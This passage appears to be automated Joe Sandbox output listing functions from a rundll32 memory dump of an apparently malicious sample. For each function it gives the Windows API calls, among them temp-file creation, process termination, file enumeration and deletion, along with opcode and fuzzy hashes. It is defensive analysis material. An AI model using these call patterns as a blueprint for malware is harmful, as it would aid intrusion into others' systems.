                                • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0347149E
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 034714BC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                • String ID:
                                • API String ID: 1496873005-0
                                • Opcode ID: 9610492521eca8f306f5076bbd1af9aa2f85c79814cfe5a7fa546740af0d0746
                                • Instruction ID: ab8ebfe24e6bd4f8a4503479549e9b6dd590543275c03d604709156bd267cfaf
                                • Opcode Fuzzy Hash: 9610492521eca8f306f5076bbd1af9aa2f85c79814cfe5a7fa546740af0d0746
                                • Instruction Fuzzy Hash: 4F214F71500205BFDB21EFB5DC84E9FB7FCAF15644B19456BA902FE204DB34D9058B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347F7F2 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(0347F67C,00000000,0349A420,0349A440,?,?,0347F67C,0348E453,0349A420), ref: 0347F802
                                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0347F818
                                • lstrlen.KERNEL32(0348E453,?,?,0347F67C,0348E453,0349A420), ref: 0347F820
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0347F82C
                                • lstrcpy.KERNEL32(0349A420,0347F67C), ref: 0347F842
                                • HeapFree.KERNEL32(00000000,00000000,?,?,0347F67C,0348E453,0349A420), ref: 0347F896
                                • HeapFree.KERNEL32(00000000,0349A420,?,?,0347F67C,0348E453,0349A420), ref: 0347F8A5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                • String ID:
                                • API String ID: 1531811622-0
                                • Opcode ID: 135fcd935db9ffe38f085be36fcdb61d2d511cd7e1280eb66d89a26897f6df36
                                • Instruction ID: 6bab6fe411f776fe0219211987afd454c5285cf4d298e8bfede674b9f8368165
                                • Opcode Fuzzy Hash: 135fcd935db9ffe38f085be36fcdb61d2d511cd7e1280eb66d89a26897f6df36
                                • Instruction Fuzzy Hash: 0321C531104244AFEB129F69DC44BABBFEAEF57350F1A409AE844AF215C7319859D7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034913B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,03480E77,00000000), ref: 034913DA
                                  • Part of subcall function 03483193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 034831CD
                                  • Part of subcall function 03483193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,034913E7,?,?,00000000,?,03480E77,00000000), ref: 034831DF
                                  • Part of subcall function 03483193: GetTickCount.KERNEL32 ref: 034831EA
                                  • Part of subcall function 03483193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,034913E7,?,?,00000000,?,03480E77,00000000), ref: 034831F6
                                  • Part of subcall function 03483193: lstrcpy.KERNEL32(00000000), ref: 03483210
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpy.KERNEL32(00000000), ref: 03491415
                                • wsprintfA.USER32 ref: 03491428
                                • GetTickCount.KERNEL32 ref: 0349143D
                                • wsprintfA.USER32 ref: 03491452
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                • String ID: "%S"
                                • API String ID: 1152860224-1359967185
                                • Opcode ID: 5845600f48914b6680e56f0a930346cecb90fa576cef296ad216657dc66e5cb1
                                • Instruction ID: e5d89a6bc31c525535cc68fe62f9c2a5db1e151e6bdbd9b431a6706f66d3f3d9
                                • Opcode Fuzzy Hash: 5845600f48914b6680e56f0a930346cecb90fa576cef296ad216657dc66e5cb1
                                • Instruction Fuzzy Hash: 8D11D376501315BFD611FBA69C48EAF7BDCDF89650B15441BF904AF201DB34980187F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347977C Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,0347314A,00000000), ref: 034797BD
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,0347314A,00000000,00000000,00000004,?,00000000,?), ref: 03479830
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                • String ID:
                                • API String ID: 2078930461-0
                                • Opcode ID: 0fa96404723c51bf95ef0a9987c66e0137c28313b47ec58111207ee42d679332
                                • Instruction ID: b287717af74e8e43f5a5d401fd6cb48723b1047fe267cb1810da752797db6713
                                • Opcode Fuzzy Hash: 0fa96404723c51bf95ef0a9987c66e0137c28313b47ec58111207ee42d679332
                                • Instruction Fuzzy Hash: 9B110431141314BFD6227F22AC49FAF3F9CEB167A1F160267F601BD280D6624858C6E4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348EA15 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348358E: lstrlen.KERNEL32(00000000,00000000,76CC81D0,773BEEF0,?,?,?,0348EA2E,?,76C85520,773BEEF0,?,00000000,0347E842,00000000,0616C310), ref: 034835F5
                                  • Part of subcall function 0348358E: sprintf.NTDLL ref: 03483616
                                • lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0347E842,00000000,0616C310), ref: 0348EA40
                                • lstrlen.KERNEL32(?,?,00000000,0347E842,00000000,0616C310), ref: 0348EA48
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • strcpy.NTDLL ref: 0348EA5F
                                • lstrcat.KERNEL32(00000000,?), ref: 0348EA6A
                                  • Part of subcall function 0348C32E: lstrlen.KERNEL32(?,?,?,00000000,?,0348EA79,00000000,?,?,00000000,0347E842,00000000,0616C310), ref: 0348C33F
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0347E842,00000000,0616C310), ref: 0348EA87
                                  • Part of subcall function 0347930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0348EA93,00000000,?,00000000,0347E842,00000000,0616C310), ref: 03479316
                                  • Part of subcall function 0347930C: _snprintf.NTDLL ref: 03479374
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 802417d495ffbd76b5218559cdf2bcfd0f49a97285109c9a5228b91b6b59363a
                                • Instruction ID: bfd1863fed41e6a73230875601a42e1a4ae559fd12060461383bef7054408686
                                • Opcode Fuzzy Hash: 802417d495ffbd76b5218559cdf2bcfd0f49a97285109c9a5228b91b6b59363a
                                • Instruction Fuzzy Hash: 1411863B9017257F4A22FBBA9C88CAF779D9E89950319041BF904AF201DF74CD4257E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03479E82 Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                                Download Yara Rule
                                APIs
                                • SwitchToThread.KERNEL32(?,?,0348E846), ref: 03479EAD
                                • CloseHandle.KERNEL32(?,?,0348E846), ref: 03479EB9
                                • CloseHandle.KERNEL32(00000000,76CDF720,?,03473576,00000000,?,?,?,0348E846), ref: 03479ECB
                                • memset.NTDLL ref: 03479EE2
                                • memset.NTDLL ref: 03479EF9
                                • memset.NTDLL ref: 03479F10
                                • memset.NTDLL ref: 03479F27
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$CloseHandle$SwitchThread
                                • String ID:
                                • API String ID: 3699883640-0
                                • Opcode ID: 3d44a84405222427779e3b5d47c5c1ee2435a867162f6a3b5116d5fc0284de77
                                • Instruction ID: 7896468781751db35d3852f4629699e54da16efdcbd586385d7daa3093918657
                                • Opcode Fuzzy Hash: 3d44a84405222427779e3b5d47c5c1ee2435a867162f6a3b5116d5fc0284de77
                                • Instruction Fuzzy Hash: 4B115435D416206BD512FB26AC04D8F7BED9FE6701B18005BF404BE358C76A462186AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347CA7A Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0347CAAB
                                • wcstombs.NTDLL ref: 0347CABC
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474975
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,00000020,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474984
                                • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0347CADD
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0347CAEC
                                • CloseHandle.KERNEL32(00000000), ref: 0347CAF3
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0347CB02
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0347CB12
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                • String ID:
                                • API String ID: 417118235-0
                                • Opcode ID: 57ffbee397b0b76464504b1f50a9655e4135e2ece7b9a66efba6486d2b0a5da8
                                • Instruction ID: 10f7b7c4667734642194f1e36da64ca178a49312e2bc5119ba2bf9482010aa1b
                                • Opcode Fuzzy Hash: 57ffbee397b0b76464504b1f50a9655e4135e2ece7b9a66efba6486d2b0a5da8
                                • Instruction Fuzzy Hash: 4E119031100215BBD712AF55DC89FAAB7A8FF15341F240052F905BE285C7B1ED54DBE4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03483193 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                • lstrcpy.KERNEL32(-000000FC,00000000), ref: 034831CD
                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,034913E7,?,?,00000000,?,03480E77,00000000), ref: 034831DF
                                • GetTickCount.KERNEL32 ref: 034831EA
                                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,034913E7,?,?,00000000,?,03480E77,00000000), ref: 034831F6
                                • lstrcpy.KERNEL32(00000000), ref: 03483210
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                • String ID: \Low
                                • API String ID: 1629304206-4112222293
                                • Opcode ID: 0a9c17b0da6f364cb1911dfa7d71725e29b854f6b1e947e354f578342e26eb88
                                • Instruction ID: 79cfe4981b5b00440297efa90137ec23f19ac3c7a3bfc0e95cbd66b39245bf2f
                                • Opcode Fuzzy Hash: 0a9c17b0da6f364cb1911dfa7d71725e29b854f6b1e947e354f578342e26eb88
                                • Instruction Fuzzy Hash: D1019239201624ABD611BBB59C49F6FB7DCEF56E51B190067F500EF244CB24D90187F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03476F51 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 03476F64
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 03476F76
                                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 03476FA0
                                • WaitForMultipleObjects.KERNEL32(00000002,03482EB3,00000000,000000FF), ref: 03476FB3
                                • CloseHandle.KERNEL32(03482EB3), ref: 03476FBC
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                • String ID: 0x%08X
                                • API String ID: 603522830-3182613153
                                • Opcode ID: 24524a8cc3dbe31e1c79336ca850855ef90bcdd8458cddaee2247d6fcf1e49a1
                                • Instruction ID: 6dafa310f7a96a141aedf2ef5de3ca8314ee1329939cf7465617fb6b315dba28
                                • Opcode Fuzzy Hash: 24524a8cc3dbe31e1c79336ca850855ef90bcdd8458cddaee2247d6fcf1e49a1
                                • Instruction Fuzzy Hash: C7014C71901129BFDB00EB90DC4ADEFBFBCEF06260B14425AA515A6189D7709605CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348D30A Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetLastError.KERNEL32(?,?,?,00001000,?,0349A2F4,76CDF750), ref: 0348D38B
                                • WaitForSingleObject.KERNEL32(00000000,00000000,?,0349A2F4,76CDF750), ref: 0348D410
                                • CloseHandle.KERNEL32(00000000,?,0349A2F4,76CDF750), ref: 0348D42A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000,?,0349A2F4,76CDF750), ref: 0348D45F
                                  • Part of subcall function 0347D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,03475546), ref: 0347D6C0
                                • WaitForSingleObject.KERNEL32(?,00000064,?,0349A2F4,76CDF750), ref: 0348D4E1
                                • CloseHandle.KERNEL32(F0FFC983,?,0349A2F4,76CDF750), ref: 0348D508
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                • String ID:
                                • API String ID: 3115907006-0
                                • Opcode ID: a0380e38f77715c4d8a2b111704ec95781ac27968ea055fbfac1dcee479fefb4
                                • Instruction ID: 8567e228bd8bfff3c8ebd21597b4f291450a48f0636902a32d75fb0966593914
                                • Opcode Fuzzy Hash: a0380e38f77715c4d8a2b111704ec95781ac27968ea055fbfac1dcee479fefb4
                                • Instruction Fuzzy Hash: 3F813B71D01219EFDF11EF99C984AAEFBB5FF09710F24445AE805AF294C730A941CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348B278 Relevance: 9.2, APIs: 6, Instructions: 200timestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • FileTimeToLocalFileTime.KERNEL32(00000000,03482702), ref: 0348B2DA
                                • FileTimeToSystemTime.KERNEL32(03482702,?), ref: 0348B2E8
                                • lstrlenW.KERNEL32(00000010), ref: 0348B2F8
                                • lstrlenW.KERNEL32(00000218), ref: 0348B304
                                • FileTimeToLocalFileTime.KERNEL32(00000008,03482702), ref: 0348B3F1
                                • FileTimeToSystemTime.KERNEL32(03482702,?), ref: 0348B3FF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                                • String ID:
                                • API String ID: 1122361434-0
                                • Opcode ID: 138353d309bb4d4e6e78f2dcf68eb0e22a677e2a78adc01fbb806a1e98150833
                                • Instruction ID: d58c3384ef5f79f9c0766cabaa5c4474c7d319c3242dd7e466b9b178610df5e0
                                • Opcode Fuzzy Hash: 138353d309bb4d4e6e78f2dcf68eb0e22a677e2a78adc01fbb806a1e98150833
                                • Instruction Fuzzy Hash: F0710C7190021AAFCB51EFA9C884AEEB7FCFF09204F14446BE505EB241E774DA45CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347E40F Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlImageNtHeader.NTDLL(?), ref: 0347E428
                                  • Part of subcall function 03487A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0347E448,?), ref: 03487A6A
                                  • Part of subcall function 03487A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 03487A7C
                                  • Part of subcall function 03487A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0347E448,?), ref: 03487A99
                                  • Part of subcall function 03487A3E: lstrlenW.KERNEL32(00000000,?,?,0347E448,?), ref: 03487AA5
                                  • Part of subcall function 03487A3E: HeapFree.KERNEL32(00000000,00000000,?,?,0347E448,?), ref: 03487AB9
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 0347E460
                                • CloseHandle.KERNEL32(?), ref: 0347E46E
                                • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0347E547
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0347E556
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0347E569
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                • String ID:
                                • API String ID: 1719504581-0
                                • Opcode ID: 1a01029ed97f8f356c3805b93da3c7f8ba204a34774dc9c9826d3a8abce31a88
                                • Instruction ID: 6019bb0633ffb5e15d6c582f7b94b57db4e2efa6071a1560eb6c83414c8efa84
                                • Opcode Fuzzy Hash: 1a01029ed97f8f356c3805b93da3c7f8ba204a34774dc9c9826d3a8abce31a88
                                • Instruction Fuzzy Hash: DE41E635500209AFDB21EF95D885EDEBBB9EF14740F18429BE904AF314E730DA95CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348D1DC Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,?), ref: 0348D237
                                • GetLastError.KERNEL32 ref: 0348D25D
                                • SetEvent.KERNEL32(00000000), ref: 0348D270
                                • GetModuleHandleA.KERNEL32(00000000), ref: 0348D2B9
                                • memset.NTDLL ref: 0348D2CE
                                • RtlExitUserThread.NTDLL(?), ref: 0348D303
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                                • String ID:
                                • API String ID: 3978817377-0
                                • Opcode ID: f672440ce7aafdb7a7e0c16764035229935ecc9cc4bb08eb5b73618562eb860c
                                • Instruction ID: ba84412574b9c83a6d3440b958fc80301df5060afd81c293eeee312ebe2d87a5
                                • Opcode Fuzzy Hash: f672440ce7aafdb7a7e0c16764035229935ecc9cc4bb08eb5b73618562eb860c
                                • Instruction Fuzzy Hash: 77414D71D01604AFCB21EFA9DC888AFB7FCEF86611764465AE806EA244D730D945CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03484F40 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a28ca8ca759256b25ce661e32423a770737db38571f43d7d863ea1f58997ba5f
                                • Instruction ID: 1e17ff81476f7867d0b67995518a3138f18076d0dbf86d430c689bb0769431a7
                                • Opcode Fuzzy Hash: a28ca8ca759256b25ce661e32423a770737db38571f43d7d863ea1f58997ba5f
                                • Instruction Fuzzy Hash: 4941E171900700DFC720FF258C8892FBBE8FB86320B144A6FE66ADE280D7709441CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347EABA Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0347AE7C: lstrlen.KERNEL32(0347E448,00000000,00000000,?,?,03487A5B,?,?,?,?,0347E448,?), ref: 0347AE8B
                                  • Part of subcall function 0347AE7C: mbstowcs.NTDLL ref: 0347AEA7
                                • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0347EB0D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BB71
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?), ref: 0348BBCC
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BBEF
                                  • Part of subcall function 0348BAD1: wcscpy.NTDLL ref: 0348BC01
                                • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0347EB2E
                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0347EB5A
                                  • Part of subcall function 0348BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0348BC27
                                  • Part of subcall function 0348BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0348BC5D
                                  • Part of subcall function 0348BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0348BC79
                                  • Part of subcall function 0348BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0348BC92
                                  • Part of subcall function 0348BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0348BCA4
                                  • Part of subcall function 0348BAD1: FindClose.KERNEL32(?), ref: 0348BCB9
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BCCD
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BCEF
                                • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0347EB77
                                • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0347EB98
                                • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0347EBAD
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                • String ID:
                                • API String ID: 2670873185-0
                                • Opcode ID: f1f60b406494f0d53e44d405a9dbd91c11730c4d86831c9b27a7b13a5c3383b1
                                • Instruction ID: 37d0c84ebe020220cf62b8845cef8a1d81ee257386c2eb897f0f2d2f880f8cfe
                                • Opcode Fuzzy Hash: f1f60b406494f0d53e44d405a9dbd91c11730c4d86831c9b27a7b13a5c3383b1
                                • Instruction Fuzzy Hash: 70315E72408305AFCB11EF65C8888AFBFEDFB98254F140A6FF585AB210D731D9458B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348EF9F Relevance: 9.1, APIs: 6, Instructions: 93memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000104,03493A4E,00000000,?,?,03489BAD,?,00000005,?,00000000), ref: 0348EFBB
                                • lstrlen.KERNEL32(00000000,00000104,03493A4E,00000000,?,?,03489BAD,?,00000005), ref: 0348EFD1
                                • lstrlen.KERNEL32(?,00000104,03493A4E,00000000,?,?,03489BAD,?,00000005), ref: 0348EFE6
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0348F04B
                                • _snprintf.NTDLL ref: 0348F071
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 0348F090
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFree_snprintf
                                • String ID:
                                • API String ID: 3180502281-0
                                • Opcode ID: b03ac100d8c7f2cd823bd796182fcc1658f827da652acb1f96592c1f7ce9bf30
